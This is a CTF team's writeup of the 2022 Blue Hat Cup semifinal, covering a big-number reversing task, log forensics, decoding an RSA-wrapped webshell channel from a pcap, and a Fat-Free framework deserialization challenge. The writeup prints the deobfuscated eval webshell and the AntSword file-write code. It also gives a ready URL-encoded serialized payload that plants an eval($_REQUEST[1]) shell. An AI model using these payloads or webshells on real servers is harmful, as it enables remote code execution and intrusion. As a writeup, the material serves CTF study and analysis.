2022 Blue Hat Cup Semifinal: Team 干煸豆角 writeup
Last edited 2022-8-4
type: Post
status: Published
date: Aug 4, 2022
summary: Team 干煸豆角 writeup
tags: CTF_Wp
category: CTF_Wp

Re

babynim

Reverse: start with the strings; there is an input prompt.

Then go find the functions.

echo and readline are the print and read calls.

Below them are two initbigint calls, which initialize the long numbers seen earlier: the usual arbitrary-precision (big-number) routine.

Then there is a multiply function; after analysis it takes the input number and multiplies it by a fixed constant, and at the end the result is compared.

So divide the target by the constant with a big-number library in C to recover the input.

Misc

Mysterious Log

Reading the linked reference shows that after LDAP comes the privilege-escalated user logon, so search the whole log for "LDAP".

The earlier hits show the authentication did not succeed; the last one shows the LDAP relay succeeded. Note that timestamp and look it up in the Security log, which shows the escalated user logging on successfully.

So the time of the successful break-in is 2022-04-17T03:27:06.7108313Z.
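The pivot above (find the relay tool's success line, then look up what the Security log recorded at that instant) done programmatically. This is an added example for this writeup, not the challenge's log format or the team's script: the log lines are constructed, the only value taken from the writeup is the timestamp, and Windows event 4624 is used as the logon-success event.

```python
import re
from datetime import datetime, timedelta, timezone

# Constructed sample lines (formats invented for this example); the only real
# value is the timestamp the writeup identified.
RELAY_LOG = [
    "2022-04-17T03:21:44.1020000Z LDAP relay to dc01 from 10.0.0.5: authentication failed",
    "2022-04-17T03:24:10.5550000Z LDAP relay to dc01 from 10.0.0.5: authentication failed",
    "2022-04-17T03:27:06.7108313Z LDAP relay to dc01 from 10.0.0.5: authentication success, escalating user",
]
SECURITY_LOG = [
    "2022-04-17T03:10:00.0000000Z EventID=4624 Account=svc_backup LogonType=3",
    "2022-04-17T03:27:06.7108313Z EventID=4624 Account=relayed_admin LogonType=3",
    "2022-04-17T03:40:12.0000000Z EventID=4634 Account=relayed_admin",
]

WINDOWS_TS = re.compile(r"(\d{4}-\d{2}-\d{2}T\d{2}:\d{2}:\d{2})\.(\d+)Z")


def parse_ts(line: str):
    """Parse a Windows event timestamp like 2022-04-17T03:27:06.7108313Z.
    datetime holds microseconds only, so the 7-digit fraction is cut to 6."""
    m = WINDOWS_TS.search(line)
    if not m:
        return None
    micro = int((m.group(2) + "000000")[:6])
    base = datetime.strptime(m.group(1), "%Y-%m-%dT%H:%M:%S")
    return base.replace(microsecond=micro, tzinfo=timezone.utc)


def relay_success_times(lines):
    """Timestamps of lines where the relay reports a successful LDAP auth."""
    return [parse_ts(l) for l in lines if re.search(r"LDAP.*success", l, re.I)]


def correlate(relay_lines, security_lines, window=timedelta(seconds=2)):
    """For each relay success, return the Security events within +/- window."""
    events = [(parse_ts(l), l) for l in security_lines]
    hits = []
    for t in relay_success_times(relay_lines):
        for ts, line in events:
            if ts is not None and abs(ts - t) <= window:
                hits.append((t.isoformat(), line))
    return hits


if __name__ == "__main__":
    for when, line in correlate(RELAY_LOG, SECURITY_LOG):
        print(when, "->", line)
```

The window is deliberately small: the relay's success line and the resulting logon event were written within the same second here, and widening the window only adds unrelated logons to sift through.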

Encrypted Channel

Reading the pcap reveals the attack framework: a file write, where 1.php writes the file rsa.php → rsa.php encrypts the traffic → a file write.

Obtaining rsa.php: rsa.php appears after the 301 packet, so the preceding request to 1.php should contain the file-write operation.

Key parameters:

Following the parameter-passing logic, write a decryption script; the result is indeed the command that writes rsa.php.

Paste it into an editor and beautify it: it turns out to have been obfuscated with the phpjiami website.

After going through many deobfuscation articles, a decode project was finally found on GitHub. Running it gives the content of rsa.php before obfuscation:
<?php
$cmd = @$_POST['ant'];
$pk = <<<EOF
-----BEGIN PUBLIC KEY-----
MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQDieYmLtWbGRSvUtevSlTOozmWR
qEGF4Hfvb1YCoVYAAlhnHnyMk+aLRvLXKgmerWiS+QD6y08Ispuzzn02tHE6d4Qp
DuPiPO9PAdGSXzFVFLK2hOrkXLsDXugNTdVUprdkPPI1YY0ZnMs1bT2Zf2dfuBI5
0S5e5sSOF85kNq/zwwIDAQAB
-----END PUBLIC KEY-----
EOF;
// 'ant' is a '|'-separated list of base64 blocks, each encrypted with the
// attacker's private key; the embedded public key recovers them.
$cmds = explode("|", $cmd);
$pk = openssl_pkey_get_public($pk);
$cmd = '';
foreach ($cmds as $value) {
    if (openssl_public_decrypt(base64_decode($value), $de, $pk)) {
        $cmd .= $de;
    }
}
// every other POST parameter is decrypted the same way
foreach ($_POST as $k => $v) {
    if (openssl_public_decrypt(base64_decode($v), $de, $pk)) {
        $_POST[$k] = $de;
    }
}
eval($cmd);
Following the stream shows a file flag.txt being written.

URL-decode the request body.

Reading the execution logic behind the ant parameter shows that the parameter carrying the file content is k85c8f24ca50da.
// cmd.php
<?php
@ini_set("display_errors", "0");
@set_time_limit(0);
$opdir = @ini_get("open_basedir");
if ($opdir) {
    $ocwd = dirname($_SERVER["SCRIPT_FILENAME"]);
    $oparr = preg_split("/;|:/", $opdir);
    @array_push($oparr, $ocwd, sys_get_temp_dir());
    foreach ($oparr as $item) {
        if (!@is_writable($item)) { continue; };
        $tmdir = $item . "/.730e32587";
        @mkdir($tmdir);
        if (!@file_exists($tmdir)) { continue; }
        @chdir($tmdir);
        @ini_set("open_basedir", "..");
        $cntarr = @preg_split("/\\\\|\//", $tmdir);
        for ($i = 0; $i < sizeof($cntarr); $i++) { @chdir(".."); };
        @ini_set("open_basedir", "/");
        @rmdir($tmdir);
        break;
    };
};;
function asenc($out) { return $out; };
function asoutput() {
    $output = ob_get_contents();
    ob_end_clean();
    echo "f4" . "612";
    echo @asenc($output);
    echo "ca5" . "8ea8";
}
ob_start();
try {
    // o9b357e1d4d7b7 = target file name, k85c8f24ca50da = file content (both "2-byte prefix + base64")
    echo @fwrite(fopen(base64_decode(substr($_POST["o9b357e1d4d7b7"], 2)), "w"), base64_decode(substr($_POST["k85c8f24ca50da"], 2))) ? "1" : "0";;
} catch (Exception $e) {
    echo "ERROR://" . $e->getMessage();
};
asoutput();
die();
Feed the k85c8f24ca50da parameter through rsa.php for decryption to get the content passed to the file write.

From the executed command, the file content is base64_decode(substr($_POST["k85c8f24ca50da"], 2)); write a script to get the flag:
<?php
// captured 'ant' parameter as sent (still RSA-encrypted, '|'-separated blocks)
$ant = "1H9CciuT5TKMuAQA2rX7iDWNZWnXc4FQHsmkm/xPLCMRBRmSN9rqZGbfdzalHtuAKfrlNYP5MK7QK+/UqmI7Og24tgvdyI7yHWhE9KwV1MoygkeRDtX8r5Y/q/EeDwXbAqkkTNrPaY+XNBCQVLvwOATSClsMTM3e9I8wH3ov3pc=|u3Ch2JM8AJIZaVAQyZhK8xGaeba22k7FBCD1i3VV94k5H4RyWCx5/CiEBGVgc6pAYiYlGuZY9izj2g4Y++Yx8/VYBKFl3jeYJ3E7vjsRWpzz/u52LBQlQWGiM+s/Ev8E3HmF7Cyers6zk+UoWh4zFWNaBuk5+S8c1Of7n7d9Ze0=|w0c7Om/PX5eZI46YaikSQ3InT/LTyyljIIRfXaO5zziRaPo93VN4z3MUdZ+E3mUYy9KREzKn9Y834eSqSNCTRBiz68I5eUHJ+5if5rb6Du3NGOLEjc8/tW44/KNCPM+/dBE0WGsnO4EtyJAqjFd38zI2V9EoPbLqid5Bmq9Vm0M=|P+RjQXf7u/NdvHnwUUIyUy1rJQyOMebs2EBKn8j9nI1nkbGbqmndKjIP3DGOGTe4caFH0RsmsYCSChplhV1JXN5R+61bNlm2l6AEhlzlO9kNfh11pwgkeUPpgbo3STCGle78q0ztuYeFyo0s861b3SQlY6q0eyWaMlZPoTUup7o=|ZYs1IJ+XjVhwtDbfkq8Qc55W9Ven2Nz31BsLwT5kgvg1emfbJc7ZsmYMLTQ+e6d4I3gXTFGPdRSisc5iwTPBIl8BNVfTr9kDcYAqHoy9MOCFlUxkDO0buCReGnEg/qSSbcNTscQKNDwTQfHO8jD+c/AmLTCdk+RuKtZ3TN8W/b8=|cVHOaP17+kAkJsZsNve2XRWXthsGrn6AFrKX4uhMf7nSoq9Xy1z9upB6goESrsvwqPF8nP9PSBcRJK0DzxPAuE9NYYL4xKsb1ag7etc/RD3t8WxvqqliLMgV2HLCkdXAcdCYeGKfyTPBownyHH31rM3ous64Gcpf/RVBrqviDMU=|TgEkUsnxF4HCzOfAaNpAwZTs/Wv8EsF9lntW1B7UB3lKJm4zVucO213Vv45VEifYhSXX1YsBLN3g2DOYT16X00SRPmhuCHU2milsAcl+UJh1xz33UZgAv8gP633gYIuxSYyOYw5MZwn4ExEANlJRHrptONhBqYOSFWCujPzhhNU=|Pbmsbvf082mfyQ5PDDo83rBfwFEB4n6q2EKNeOpPR10C80Ko2hAVC75uHjbAbJfVijmPVduSSI6AbCkoccKsvezeCaa9X54O28UMNsGFrmlLKDLTBs7qBgK3EsBVetqGSEgonVTawTaw2YsuVLf3Bxk+7RJ/yewOam0FcdH1h5Q=|H28A54ZKdDMRtI0fHv14RN90yQLn/6m/m1Qn/YhVdHs5FeHDyOUbjbpInUU7bMOJKGTbI88Kw2p6QzGyqvever+kPMIqrkP7Fa2tIDQCq6DboFpF9wcUJ4zUQKKleXeUkvtfcPOdPePUSpNN2Y33HDiKtanY4cIhffvAkLy44oI=|Gb6e15DVS+JgwYx/mspwD/v7nbjHNmIqq5TZ+Eu+mR4UGTDVj7HLu4SekhCyL1ZLtjDe9GzrQIFl0OFu+Z2P3VrFNWO1Du2CJ9TpIrrInf9qN5sxpY7zJ8X1lkOmq++OZar8dMh0gDKQgSfy88zPlQRkhM48IASaowjfArVAvf4=|R6EJxGrbVadm0NF6K+iu0MkY3Hmn+0s+f4YyC/AXqslWN5UtwfeFMiMAa3apSUB3diMKasNRkVwDC/sjup1Pl1SsLixOXabKSUOA+vSbaUWoW9I+JRPP3M38pDH/jNN3tMi4vLU60mqK8N+BySXOpTXxSGzu0f3sTgNzT3/SGig=|OXWSDhuRuPXtKlsR2zidy+AI/TQS6qvex79FvF2dQ+Druvh/gglIgFo/yCn/tPWFqOsMUBj6rk3RqkTTd4dgE6Zrc7wAVP+TNSTaueFPJUuiUriNAIJ/UusGwNv+VTaWZt50rr2h0/+V/tpNa0Oi084ZQT503O1uorrc4R7nPXw=";

// k85c8f24ca50da after rsa.php decryption: 2-byte prefix + base64 of the file content
$k85c8f24ca50da = "4MZmxhZ3s4NDRkZmM4NmRhMjNhNGQ1MjgzOTA3ZWZhZjk3OTFhZH0=";
var_dump(base64_decode(substr($k85c8f24ca50da, 2)));

// o9b357e1d4d7b7 (the target file name) as captured, still in encrypted form
$o9b357e1d4d7b7 = "Vw12/DDnvTFUuLl9FEAp0ei1E5Es0kwGDfGg1XbpQhAYy0mQeNMk0O9WhJAP/uKduN/VpDWCwfF7GiN/FyrCJBKWbUdpflTzaQn4EHsY8GT5uW9sz12nyWzilMAEECgs3rdk3ELeBpm/AmqYV8VnoUbZX3HL0Z7VBaQKHiRGIL8=";
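The whole decoding path described in this section, the rsa.php channel format ('|'-separated, base64, RSA-"private-encrypted" blocks recovered with the public key) and the cmd.php post-processing of the k85c8f24ca50da parameter, rebuilt in Python as an added example for this writeup. It is not the team's script and not the challenge's code. The RSA key pair is a constructed toy key generated at run time: the capture only contains the attacker's 1024-bit public key, so a private half has to be made up to produce sample traffic; the PKCS#1 v1.5 type-1 padding and the skip-on-failure loop are the behaviour of OpenSSL's RSA_private_encrypt/openssl_public_decrypt that rsa.php relies on.

```python
import base64
import random


def _is_probable_prime(n: int, rounds: int = 20) -> bool:
    """Miller-Rabin test; enough for a throwaway demo key."""
    if n < 2:
        return False
    for p in (2, 3, 5, 7, 11, 13, 17, 19, 23, 29):
        if n % p == 0:
            return n == p
    d, s = n - 1, 0
    while d % 2 == 0:
        d //= 2
        s += 1
    for _ in range(rounds):
        x = pow(random.randrange(2, n - 1), d, n)
        if x in (1, n - 1):
            continue
        for _ in range(s - 1):
            x = pow(x, 2, n)
            if x == n - 1:
                break
        else:
            return False
    return True


def _gen_prime(bits: int) -> int:
    while True:
        cand = random.getrandbits(bits) | (1 << (bits - 1)) | 1
        if _is_probable_prime(cand):
            return cand


def make_keypair(bits: int = 512):
    """Constructed toy key (n, e, d). NOT the key from the capture: rsa.php only
    embeds the attacker's 1024-bit public half, the private half is unknown."""
    e = 65537
    while True:
        p, q = _gen_prime(bits // 2), _gen_prime(bits // 2)
        phi = (p - 1) * (q - 1)
        if p != q and phi % e:          # e is prime, so this is gcd(e, phi) == 1
            return p * q, e, pow(e, -1, phi)


def _block_size(n: int) -> int:
    return (n.bit_length() + 7) // 8


def private_encrypt(data: bytes, n: int, d: int) -> bytes:
    """Client side of the channel (OpenSSL RSA_private_encrypt):
    PKCS#1 v1.5 block type 1 padding, then m^d mod n."""
    k = _block_size(n)
    if len(data) > k - 11:
        raise ValueError("block too long for this modulus")
    padded = b"\x00\x01" + b"\xff" * (k - 3 - len(data)) + b"\x00" + data
    return pow(int.from_bytes(padded, "big"), d, n).to_bytes(k, "big")


def public_decrypt(blob: bytes, n: int, e: int):
    """Mirror of PHP openssl_public_decrypt(): the data bytes, or None when the
    block does not recover to valid type-1 padding (where PHP returns false)."""
    k = _block_size(n)
    if len(blob) != k:
        return None
    m = pow(int.from_bytes(blob, "big"), e, n).to_bytes(k, "big")
    sep = m.find(b"\x00", 2)
    if m[:2] != b"\x00\x01" or sep < 10 or any(b != 0xFF for b in m[2:sep]):
        return None
    return m[sep + 1:]


def encode_channel(cmd: bytes, n: int, d: int) -> str:
    """Build the 'ant' value: per-block private-encrypt, base64, join with '|'."""
    step = _block_size(n) - 11
    blocks = [cmd[i:i + step] for i in range(0, len(cmd), step)]
    return "|".join(base64.b64encode(private_encrypt(b, n, d)).decode() for b in blocks)


def decode_channel(ant: str, n: int, e: int) -> bytes:
    """The loop rsa.php runs over $_POST['ant']; blocks that fail to decrypt
    are skipped silently, exactly like the PHP."""
    out = b""
    for value in ant.split("|"):
        try:
            raw = base64.b64decode(value)
        except ValueError:              # binascii.Error is a ValueError subclass
            continue
        de = public_decrypt(raw, n, e)
        if de is not None:
            out += de
    return out


def decode_file_param(value: str) -> bytes:
    """What cmd.php does with the decrypted k85c8f24ca50da parameter:
    base64_decode(substr($_POST["k85c8f24ca50da"], 2))."""
    return base64.b64decode(value[2:])


if __name__ == "__main__":
    n, e, d = make_keypair()
    cmd = b"<?php echo 'constructed demo command'; ?>"   # constructed sample
    ant = encode_channel(cmd * 3, n, d)
    print(decode_channel(ant, n, e) == cmd * 3)
```

The design point for an analyst is that the channel is "signed", not encrypted in any confidentiality sense: every block is recoverable with the public key that ships inside rsa.php itself, which is exactly why the writeup could decode the capture once it had the deobfuscated file. The fixed framing (base64 blocks of the modulus size joined by '|') is also a usable detection signature for this webshell family's traffic.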

Web

easyfatfree

Get the source from www.zip.

It is the same as the 2020 CISCN challenge.

The web directory is not writable, but the ui directory is.
<?php
namespace DB;

//! In-memory/flat-file DB wrapper
class Jig {
    //@{ Storage formats
    const FORMAT_JSON = 0, FORMAT_Serialized = 1;
    //@}
    protected
        //! Storage location
        $dir = '/var/www/html/ui/',
        //! Current storage format
        $format = 'self::FORMAT_JSON',
        //! Memory-held data
        $data = array('wumonster.php' => array('a' => '<?php eval($_REQUEST[1]);phpinfo();?>')),
        //! lazy load/save files
        $lazy = TRUE;
    /**
     * Read data from memory/file
     * @return array
     * @param $file string
     **/
}

$jig = new Jig();
echo urlencode(serialize($jig));
payload=O%3A6%3A%22DB%5CJig%22%3A4%3A%7Bs%3A6%3A%22%00%2A%00dir%22%3Bs%3A17%3A%22%2Fvar%2Fwww%2Fhtml%2Fui%2F%22%3Bs%3A9%3A%22%00%2A%00format%22%3Bs%3A17%3A%22self%3A%3AFORMAT_JSON%22%3Bs%3A7%3A%22%00%2A%00data%22%3Ba%3A1%3A%7Bs%3A13%3A%22wumonster.php%22%3Ba%3A1%3A%7Bs%3A1%3A%22a%22%3Bs%3A37%3A%22%3C%3Fphp+eval%28%24_REQUEST%5B1%5D%29%3Bphpinfo%28%29%3B%3F%3E%22%3B%7D%7Ds%3A7%3A%22%00%2A%00lazy%22%3Bb%3A1%3B%7D
After writing the shell, the root directory still cannot be accessed.

Use the AntSword plugin to bypass disable_function, then cat /flag.

Forensics

Phone 1

Phone 2

exe1

exe2

exe3

exe4

exe5

apk2

For the phone forensics questions, MT Manager was used on the phone.

base64-decode to get the server address.

apk5

Same as apk6.

apk6

apk7

There are 3 activities, so the answer should be 3.

apk8

apk9

apk10

Permissions.

apk11

apk12

apk13

Server 5

6 plugins were found under the /www/server directory.